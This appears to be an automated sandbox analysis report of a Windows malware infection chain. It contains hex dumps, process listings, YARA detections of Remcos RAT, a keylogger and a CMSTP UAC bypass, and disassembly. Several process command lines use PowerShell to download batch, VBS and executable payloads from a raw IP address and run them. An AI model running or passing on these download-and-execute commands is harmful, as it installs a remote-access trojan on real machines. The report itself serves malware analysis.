                                        Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P0.text `.rdata002@@.data,)pH@.rsrcP@@USVWj'uv=`2A6PPe~v8^3h3APPPp1AEE;FrP,fY-jt1At$l39wAt@9D$tt$Ph5wA2A3D$`|$u@3D$VtPQ^T$Vt$fBBFFfu^L$3f9t@f<AuS\$VC;^tLW3jZQ39FY~9F~fAfG@;F|6YF>f$G^_^[UQQlwAuVjjEP5wA
                                        Sep 25, 2024 18:40:27.767319918 CEST1236INData Raw: ff 15 6c 31 41 00 85 c0 74 3e 8b 45 fc 3b 45 10 77 36 72 08 8b 45 f8 3b 45 0c 73 2c 6a 2a e8 d4 0d 00 00 50 e8 48 65 00 00 83 f8 01 59 59 74 11 c7 05 28 77 41 00 6a 00 00 00 b8 05 40 00 80 eb 20 83 0d 6c 77 41 00 01 8d 45 0c 50 6a 00 68 01 80 00
                                        Data Ascii: l1At>E;Ew6rE;Es,j*PHeYYt(wAj@ lwAEPjh5wA2A3D$t(wA@:Vt$W~ ?tNF0PKu~tv<v$h1A_3^UVud1A}juuv$j}iuv$jjduVP^]
                                        Sep 25, 2024 18:40:27.767332077 CEST630INData Raw: c7 e9 ff 02 00 00 8d 4d f0 e8 89 fd ff ff 66 39 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 81 fc ff ff 8d 45 f0 50 8d 46 0c 50 8d 45 e4 50 8d 5e 24 e8 98 fd ff ff 83 c4 0c 50 8b cb e8 9b fc ff ff ff 75 e4 e8 2f
                                        Data Ascii: Mf9}f}uMEPFPEP^$Pu/9}YoFURjuf}f}PQ;EtMu}Y^f9}u~<-f}t jeVPMruY,EF<FURjuPQ;Eu3f9}U
                                        Sep 25, 2024 18:40:27.767426968 CEST1236INData Raw: 00 84 c0 75 11 8b 1e ff 15 50 31 41 00 50 6a 6a 56 ff 53 20 eb 84 ff 75 e4 e8 f0 02 01 00 59 8b 75 0c 8b 4d fc 56 e8 0b 6e 00 00 8b 45 10 8d 4d d4 89 30 e8 81 d3 00 00 eb 23 8b 45 10 89 38 e9 fb fd ff ff 8b 3e ff 15 50 31 41 00 50 6a 69 56 ff 57
                                        Data Ascii: uP1APjjVS uYuMVnEM0#E8>P1APjiVW E8uYMK3jdVPuYM,^_[Vjt$<0Au0P1A;tPd1A3^t$80AtuV3@^<uPpA< t<t
                                        Sep 25, 2024 18:40:27.767441034 CEST1236INData Raw: 57 ff d6 ff 75 fc 6a 00 ff 15 44 32 41 00 8b 45 f4 eb 17 ff 75 fc 57 ff 15 44 32 41 00 57 57 57 57 ff 75 08 ff 15 f0 32 41 00 5f 5e 5b c9 c3 55 8b ec 83 ec 68 53 56 57 6a 40 8d 45 98 50 ff 75 08 ff 15 e0 32 41 00 85 c0 0f 84 2d 01 00 00 68 d0 33
                                        Data Ascii: WujD2AEuWD2AWWWWu2A_^[UhSVWj@EPu2A-h3AEPt0Aju2AEPu2APh3A3;}uj@p0AuSWV3AEPVW3A9uEPhLA
                                        Sep 25, 2024 18:40:27.767757893 CEST1236INData Raw: 08 8b 76 04 3b d6 74 09 40 3b 41 04 7c c3 83 c8 ff 5f 5b 5e 5d c2 08 00 53 8b 5c 24 08 56 8b f1 43 3b 5e 08 74 39 57 53 e8 3f f9 00 00 8b f8 33 c0 39 46 08 59 7e 1b 39 46 04 7e 0e 8b 0e 8a 0c 08 88 0c 38 40 3b 46 04 7c f2 ff 36 e8 15 f9 00 00 59
                                        Data Ascii: v;t@;A|_[^]S\$VC;^t9WS?39FY~9F~8@;F|6YF>^_^[S\$VWy+qN;~0@~+3H0;}+Wp_^[QL$+THRQL$HP1AT$Vt$BFu^V
                                        Sep 25, 2024 18:40:27.767770052 CEST492INData Raw: 00 5e 89 47 04 5b 8b c7 5f c3 55 8b ec 53 56 8b 75 08 8b ce e8 29 fe ff ff 8b 45 0c 33 db 39 58 04 74 32 57 8b 78 04 8b 00 53 8d 0c 3f 89 45 08 53 8d 41 01 50 51 8b ce e8 7f fe ff ff 50 57 ff 75 08 53 ff 75 10 ff 15 a4 30 41 00 8b 0e 88 1c 08 89
                                        Data Ascii: ^G[_USVu)E39Xt2WxS?ESAPQPWuSu0AF_^[]UM<}jMFV50AW}juPuuY7S@PPMPSuVf$FYEEP*VY[_^U SVW}3SSSS
                                        Sep 25, 2024 18:40:27.767784119 CEST1236INData Raw: 00 83 c4 0c 39 5d f0 77 0d 81 7d ec 00 00 10 00 0f 86 22 ff ff ff 8b 4d 14 33 c0 39 59 04 0f 95 c0 eb 06 b0 01 eb 02 32 c0 5f 5e 5b c9 c3 55 8b ec 51 8b 4d 08 e8 1c fc ff ff 83 26 00 8a 0f eb 17 80 f9 3d 74 20 ff 75 fc 8b 4d 08 e8 97 fc ff ff ff
                                        Data Ascii: 9]w}"M39Y2_^[UQM&=t uMMtEU=wAujzVWMEu<t<tPM7GuhEPEP}_^uu5PpAjj4Mj j
                                        Sep 25, 2024 18:40:27.767796993 CEST1236INData Raw: c3 56 ff 15 64 32 41 00 33 db 3b c3 89 45 fc 74 e0 68 74 34 41 00 ff 15 54 30 41 00 8d 45 cc 50 56 e8 51 ed ff ff 59 59 56 ff 15 e8 32 41 00 68 19 04 00 00 8b f8 ff 15 c0 30 41 00 8b 45 d8 2b 45 d0 53 53 57 ff 75 fc 50 8b 45 d4 2b 45 cc 50 ff 75
                                        Data Ascii: Vd2A3;Etht4AT0AEPVQYYV2Ah0AE+ESSWuPE+EPuuhPh\3Ah\4AST2A;{V<2A52ASj"hYWj2APShCWPEEPEP]uEPhaWuuYYUQSVW=0Aj
                                        Sep 25, 2024 18:40:27.767808914 CEST1236INData Raw: ff eb 41 ff 75 10 ff 75 fc 53 e8 b4 f6 ff ff 83 c4 0c 8d 4d a4 8a d8 e8 09 f1 ff ff ff 75 e0 e8 da e8 00 00 8a c3 eb 26 ff 75 10 ff 75 f8 eb d9 8b 4d 0c 8d 45 a4 50 e8 30 fc ff ff 8d 4d a4 e8 e1 f0 ff ff ff 75 e0 e8 b2 e8 00 00 b0 01 59 5f 5e 5b
                                        Data Ascii: AuuSMu&uuMEP0MuY_^[USVW}W0AWME39uVMD_f=\}tf=/uft_K]"wf=/tf=\tNf$wWYtEP0AW80AuEPW(
                                        Sep 25, 2024 18:40:27.774641037 CEST284INData Raw: 00 ff 75 d8 e8 21 e4 00 00 ff 75 b4 e8 19 e4 00 00 ff 75 cc e8 11 e4 00 00 56 e8 0b e4 00 00 ff 75 e4 e8 03 e4 00 00 83 c4 24 5f 5e 33 c0 5b c9 c3 55 8b ec 51 51 53 8b 5d 08 83 7b 04 00 56 8b f1 75 04 33 c0 eb 5f 57 8b 7d 0c 57 53 e8 ef ee ff ff
                                        Data Ascii: u!uuVu$_^3[UQQS]{Vu3_W}WSYYt3ICEG39~E}~0WS|!uWQuW+}E;~|E_^[UMuMh5AMh5AMIMEPEPBu


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:12:40:16
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
                                        Imagebase:0x7ff68f0f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:12:40:16
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:12:40:16
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:12:40:19
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:12:40:21
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:12:40:23
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c C:\Users\user\AppData\Roaming/hi.vbs
                                        Imagebase:0x7ff68f0f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:12:40:23
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:12:40:24
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
                                        Imagebase:0x7ff7228c0000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:12:40:25
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
                                        Imagebase:0x7ff68f0f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:12:40:25
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:12:40:25
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
                                        Imagebase:0x7ff6e3d50000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:12:40:31
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming/AUGUST.exe
                                        Imagebase:0x400000
                                        File size:4'809'996 bytes
                                        MD5 hash:25860926414BF43383246F7C773A8D6C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000003.2318798588.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 3%, ReversingLabs
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:12:40:33
                                        Start date:25/09/2024
                                        Path:C:\Users\user\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\DZIPR.exe"
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:12:40:34
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:12:40:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmd.exe
                                        Imagebase:0x1c0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:12:40:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:12:40:44
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                        Imagebase:0x7ff7403e0000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:23
                                        Start time:12:40:53
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:24
                                        Start time:12:40:53
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmd.exe
                                        Imagebase:0x1c0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        Has exited:true

                                        General

                                        Target ID:25
                                        Start time:12:40:53
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:26
                                        Start time:12:41:01
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x810000
                                        File size:4'514'184 bytes
                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmd.exe
                                        Imagebase:0x1c0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x810000
                                        File size:4'514'184 bytes
                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:12:41:29
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x810000
                                        File size:4'514'184 bytes
                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:17.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:25.9%
                                          Total number of Nodes:1474
                                          Total number of Limit Nodes:20
                                          execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 